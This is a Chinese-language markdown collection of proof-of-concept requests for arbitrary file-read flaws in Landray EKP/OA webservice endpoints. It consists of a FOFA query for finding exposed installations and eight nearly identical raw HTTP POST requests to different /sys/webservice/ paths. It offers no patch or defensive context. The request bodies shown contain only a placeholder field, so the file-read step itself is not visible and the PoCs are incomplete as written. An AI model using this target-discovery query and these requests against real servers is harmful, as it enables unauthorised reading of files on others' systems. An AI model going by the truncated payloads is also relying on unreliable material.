# 蓝凌EKP系统任意文件读取漏洞集合
蓝凌OA webservice服务多处 接口存在任意文件读取漏洞
## fofa
```javascript
body="Com_Parameter"
```
## poc1
```javascript
POST /sys/webservice/sysTagWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc2
```javascript
POST /sys/webservice/sysNotifyTodoWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc3
```javascript
POST /sys/webservice/kmImeetingBookWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc4
```javascript
POST /sys/webservice/kmImeetingResWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc5
```javascript
POST /sys/webservice/loginWebserviceService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc6
```javascript
POST /sys/webservice/wechatWebserviceService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc7
```javascript
POST /sys/webservice/sysNotifyTodoWebServiceEkpj HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
## poc8
```javascript
POST /sys/webservice/sysSynchroGetOrgWebService HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
SOAPAction: ""
Accept-Encoding: gzip, deflate
------4upt9dwdca8rtwq9osuz
Content-Disposition: form-data; name="a"
a
------4upt9dwdca8rtwq9osuz--
```
